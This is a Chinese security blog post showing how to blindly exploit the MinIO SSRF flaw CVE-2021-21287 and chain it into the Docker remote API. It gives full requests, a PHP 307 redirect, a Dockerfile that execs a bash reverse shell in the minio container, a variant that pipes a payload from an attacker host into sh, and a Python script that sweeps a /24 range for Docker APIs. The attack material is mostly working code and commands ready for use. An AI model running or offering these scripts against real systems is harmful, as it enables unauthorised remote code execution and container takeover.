Minio-ssrf盲打

字数:1.9k字 | 预计阅读时长:9分钟

文章首发于火线安全

地址http://zone.huoxian.cn/d/2801-minio-ssrf-docker-api

前言

Minio SSRF漏洞-CVE-2021-21287,由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。

但这个漏洞没有回显,利用起来也比较麻烦,目前已知的利用方式是用重定向去打docker api和内网的其他服务。

在不知道docker集群地址的情况下,也只能通过盲打的方式去碰运气了。

漏洞复现

漏洞验证

服务器开启NC监听

sudo nc -lvp 80

发送如下数据包,将HOST头修改为服务器地址

1
2
3
4
5
6
7
POST /minio/webrpc HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 76

{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}

若NC有反应,则漏洞存在

漏洞利用

这个漏洞利用主要通过307的可控路径重定向让目标去请求指定服务

可以先来尝试一下,编辑index.php,输入以下内容

1
2
<?php
header('Location: http://192.168.203.130:8080', false, 307);

开启一个简单的http服务

php -S 0.0.0.0:80

我们让其重定向去访问 http://192.168.203.130:8080

在192.168.203.130的8080端口启动NC监听

sudo nc -lvp 8080

发送数据包

1
2
3
4
5
6
7
POST /minio/webrpc HTTP/1.1
Host: 192.168.203.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 76

{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}

Snipaste_2023-05-14_23-07-35

可以看到我们的8080端口确实收到了请求

利用过程如图

minio

这里黑客指定地址如上面的代码,也就是http://192.168.203.130:8080,假如我们把这个地址换为其他地址呢,比如docker api或者内网其他服务的地址。

现在尝试攻击docker api的2375端口

在黑客服务器上编辑index.php文件,内容如下

<?php header('Location: http://192.168.203.130:2375/build?remote=http://192.168.203.130/Dockerfile&nocache=true&t=evil:1', false, 307);

这里的两个地址需要做一个说明,我这里为了方便在一台机子上做的测试,在实际环境中地址不同。

编辑Dockerfile文件,内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
FROM alpine:3.13

RUN apk add curl bash jq

RUN set -ex && \
{ \
	echo '#!/bin/bash'; \
	echo 'set -ex'; \
	echo 'target="http://192.168.203.130:2375"'; \
	echo 'jsons=$(curl -s -XGET "${target}/containers/json" | jq -r ".[] | @base64")'; \
	echo 'for item in ${jsons[@]}; do'; \
	echo '    name=$(echo $item | base64 -d | jq -r ".Image")'; \
	echo '    if [[ "$name" == *"minio/minio"* ]]; then'; \
	echo '        id=$(echo $item | base64 -d | jq -r ".Id")'; \
	echo '        break'; \
	echo '    fi'; \
	echo 'done'; \
	echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{\"Cmd\": [\"bash\", \"-c\", \"bash -i >& /dev/tcp/192.168.203.130/8080 0>&1\"]}" | jq -r ".Id")'; \
	echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"'; \
} | bash

其中target为 docker api的地址,execid下的反弹shell要修改为自己服务器监听地址

我们在自己的服务器开启简单php服务和nc监听

sudo php -S 0.0.0.0:80

sudo nc -lvp 8080

再次发送数据包

1
2
3
4
5
6
7
POST /minio/webrpc HTTP/1.1
Host: x.x.x.x #黑客地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 76

{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}

Snipaste_2023-05-14_23-11-36

可以看到,已经成功的请求了我们的恶意dockerfile文件,并获得了一个shell

自动化盲打

那么问题来了,这里作为测试我们知道docker api的地址为192.168.203.130,在实际环境中我们是不知道docker集群的api地址的,甚至连有没有docker集群都不一定,这个时候就只能盲打碰碰运气了

难点在于要利用这个漏洞不断地向我们的服务器获取重定向的地址,服务器端要不断的刷新这个重定向的地址。

为此写了一个简单的盲打脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import os
import ipaddress
import re
import requests
import time

server = "192.168.203.130"  #  Nc监听服务器地址
ip_icdr = "192.168.203.0/24" # 要爆破的c段

def replace_ip(file,ip):
    with open(file,'r',encoding='utf8') as f:
        content = f.read()

    ip_regex = r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
    ip_addresses = re.findall(ip_regex, content)
    for i in ip_addresses:
        if i != server:
            content = content.replace(i,ip)

    with open(file,'w') as f:
        f.write(content)

def replace(old,new):
	old_ip  = old+':2375'
	new_ip = new+':2375'
	cmd = 'sed -i "s/{0}/{1}/g" index.php'.format(old_ip,new_ip)
	cmd2 = 'sed -i "s/{0}/{1}/g" Dockerfile'.format(old_ip,new_ip)
	os.system(cmd)
	os.system(cmd2)

def url_send(ip):
	url="http://192.168.203.130:9000" #目标服务器地址
#	proxies={'http':'http://192.168.1.5:8089'}
	headers = {
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
	'Host': server,
	'Content-Type': 'application/json'}
	url = url+"/minio/webrpc"
	data = """{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}"""

	response = requests.post(url, headers=headers, data=data,timeout=10) 
	print("try "+url+  "   >>  " + str(response.status_code)+"   >>    "+ip)


def main():
	ip = []
	ip_network = ipaddress.ip_network(ip_icdr)
	for i in ip_network:
		ip.append(i)
	replace_ip('index.php',str(ip[1]))
	replace_ip('Dockerfile',str(ip[1]))
	url_send(str(ip[1]))
	for i in range(2,len(ip)):
		replace(str(ip[i-1]),str(ip[i]))
#		print(str(ip[i-1])+">>" + str(ip[i]))
		url_send(str(ip[i]))


		
if __name__ ==  "__main__":
	main()
  1. 将给脚本放到服务器上,在当前目录还需要另外两个文件
  • Dockerfile
  • index.php

index.php的文件内容

1
2
<?php
header('Location: http://192.168.203.130:2375/build?remote=http://192.168.203.130/Dockerfile&nocache=true&t=evil:1', false, 307);

注意修改remote地址为自己服务器的地址

  1. Dockfile文件内容

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    FROM alpine:3.13

    RUN apk add curl bash jq

    RUN set -ex && \
    { \
    	echo '#!/bin/bash'; \
    	echo 'set -ex'; \
    	echo 'target="http://192.168.203.143:2375"'; \
    	echo 'jsons=$(curl -s -XGET "${target}/containers/json" | jq -r ".[] | @base64")'; \
    	echo 'for item in ${jsons[@]}; do'; \
    	echo '    name=$(echo $item | base64 -d | jq -r ".Image")'; \
    	echo '    if [[ "$name" == *"minio/minio"* ]]; then'; \
    	echo '        id=$(echo $item | base64 -d | jq -r ".Id")'; \
    	echo '        break'; \
    	echo '    fi'; \
    	echo 'done'; \
    	echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{\"Cmd\": [\"bash\", \"-c\", \"curl http://192.168.203.143:13338 | sh\"]}" | jq -r ".Id")'; \
    	echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"'; \
    } | bash

    注意修改这串命令curl http://192.168.203.143:13338 | sh

    这里可以使用nc的反弹命令,但nc长时间监听被别人扫描会有一些花里胡哨的东西,且nc只能管理单个shell,这里我用了一款shell管理器 platypus

    启动 platypus,便会生成链接地址

    ./platypus_linux_amd64

image-20230520171912576

将生成的命令替换为dockerfile的命令即可

  1. 修改脚本相关注释内容即可

    image-20230520172114318

我只设置了爆破c段,我觉得挑几个常见的c段爆破一下碰下运气就行了,没必要弄那么大的动静把内网来一遍

image-20230520172310029

确保这个目录下存在这三个文件,开启相关服务就可以直接运行脚本了

image-20230520172439983

php -S 0.0.0.0:80

python3 minio.py

Snipaste_2023-05-14_22-08-01

可以看到目标最终请求了我们的Dockerfile文件

platypu也成功获得了一个shell

Snipaste_2023-05-14_22-07-26

演示视频

总结

当然也不只局限于用来打docker api,也可以利用常规的ssrf利用手段来盲打其他服务,改下脚本就行,另外我也只写了爆破c段,盲打这种东西本来就是靠运气的,大家也可以改改脚本来爆破b段。

参考文献

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。